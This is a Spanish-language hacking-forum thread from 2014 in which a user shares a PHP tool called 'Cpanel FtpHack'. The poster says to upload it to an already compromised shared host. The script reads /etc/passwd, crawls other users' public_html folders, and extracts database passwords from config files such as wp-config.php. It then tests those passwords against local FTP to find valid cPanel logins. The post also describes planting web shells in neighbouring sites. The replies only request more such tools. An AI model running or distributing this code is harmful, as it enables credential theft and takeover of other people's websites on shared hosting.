Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: josemi en Julio 25, 2014, 10:15:20 AM

Título: Cpanel FtpHack and bypass directorios
Publicado por: josemi en Julio 25, 2014, 10:15:20 AM
buenas, aquí le dejo esta herramienta muy util para sacar muchos hackedhost en mis tiempo era una tool private del foto  [email protected]  :-[ a según ese foro lo defaceraon y por ahí subieron todas las tool private (googleen xD)

solo necesitas subirla algún hackedhost y ejecutarlo.. el sistema empezara a buscar las clave de cpanel del host ademas también publica directorio "bypasseable" es decir si en ese host hay varias pagina alojada te da el directorio de dicha web por ejemplo "home/$underc0de/public_html/" entonces por medio de shell entramos en ese directorio.. En caso que tengamos permisos de escritura podemos subir shell por ahí en caso que no entonces hay que revisar que cms usa editar el config.php y subir la shell


espero que aun funcione..  esta herramienta me fue muy útil  :'(

Código (php) [Seleccionar]
<?php
echo "<html>";
echo 
"<title>[email protected]</title><body>";

set_time_limit(0);
##################
@$passwd=fopen('/etc/passwd','r');
if (!
$passwd) {
   echo 
"[-] Error : coudn't read /etc/passwd";
   exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!
feof($passwd)) {
  
$str=fgets($passwd);
  if (
$i>35) {
    
$pos=strpos($str,":");
    
$username=substr($str,0,$pos);
    
$dirz="/home/$username/public_html/";
    if ((
$username!="")) {
        if (
is_readable($dirz)) {
            
array_push($users,$username);
            
array_push($path_to_public,$dirz);
        }
    }
  }
  
$i++;
}
###################

#########################
echo "<br><br>";
echo 
"<textarea name='main_window' cols=100 rows=20>";

echo 
"[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo 
"[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";

echo 
"[~] Searching for passwords in config.* files...\n\n";
foreach (
$users as $user) {
        
$path="/home/$user/public_html/";
        
read_dir($path,$user);
}

echo 
"\n[+] Done\n";

function 
read_dir($path,$username) {
    if (
$handle opendir($path)) {
        while (
false !== ($file readdir($handle))) {
              
$fpath="$path$file";
              if ((
$file!='.') and ($file!='..')) {
                 if (
is_readable($fpath)) {
                    
$dr="$fpath/";
                    if (
is_dir($dr)) {
                       
read_dir($dr,$username);
                    }
                    else {
                         if ((
$file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
                            
$pass=get_pass($fpath);
                            if (
$pass!='') {
                               echo 
"[+] $fpath\n$pass\n";
                               
ftp_check($username,$pass);
                            }
                         }
                    }
                 }
              }
        }
    }
}

function 
get_pass($link) {
    @
$config=fopen($link,'r');
    while(!
feof($config)) {
        
$line=fgets($config);
        if (
strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
            if (
strrpos($line,'"'))
               
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
            else
               
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
            return 
$pass;
        }
    }
}

function 
ftp_check($login,$pass) {
     @
$ftp=ftp_connect('127.0.0.1');
     if (
$ftp) {
        @
$res=ftp_login($ftp,$login,$pass);
        if (
$res) {
           echo 
'[Cpanel Found !!!] '.$login.':'.$pass."  Success\n";
        }
        else 
ftp_quit($ftp);
     }
}

echo 
"</textarea><br>";

echo 
"</body></html>";
?>
Título: Re:Cpanel FtpHack and bypass directorios
Publicado por: blackdrake en Julio 25, 2014, 10:24:19 AM
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.
Título: Re:Cpanel FtpHack and bypass directorios
Publicado por: josemi en Julio 25, 2014, 11:49:18 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.


yo creo que la debo tener por ahí guardada .. tengo que buscarla tengo como 5 años si revisar mi disco duro portátil y no recuerdo donde guardaba eso, también tengo la tool priv8 del doom team aunque esa si ya están obsoletas xD
Título: Re:Cpanel FtpHack and bypass directorios
Publicado por: blackdrake en Julio 25, 2014, 12:04:21 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.


yo creo que la debo tener por ahí guardada .. tengo que buscarla tengo como 5 años si revisar mi disco duro portátil y no recuerdo donde guardaba eso, también tengo la tool priv8 del doom team aunque esa si ya están obsoletas xD

Si las encuentras, pasamelas por favor

Un saludo :D
Título: Re:Cpanel FtpHack and bypass directorios
Publicado por: hielasangre en Julio 25, 2014, 12:06:47 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.


yo creo que la debo tener por ahí guardada .. tengo que buscarla tengo como 5 años si revisar mi disco duro portátil y no recuerdo donde guardaba eso, también tengo la tool priv8 del doom team aunque esa si ya están obsoletas xD

Es DOM team, y esta tool que yo sepa es publica desde el año 2006 masomenos xD
Título: Re:Cpanel FtpHack and bypass directorios
Publicado por: josemi en Julio 25, 2014, 12:09:29 PM
jajaja si DOM TEAM  :-[ , ah bueno hubo unas publica y otra privada de todas forma ya es material obsoleto , jaja ya me siento viejo 2006  ::)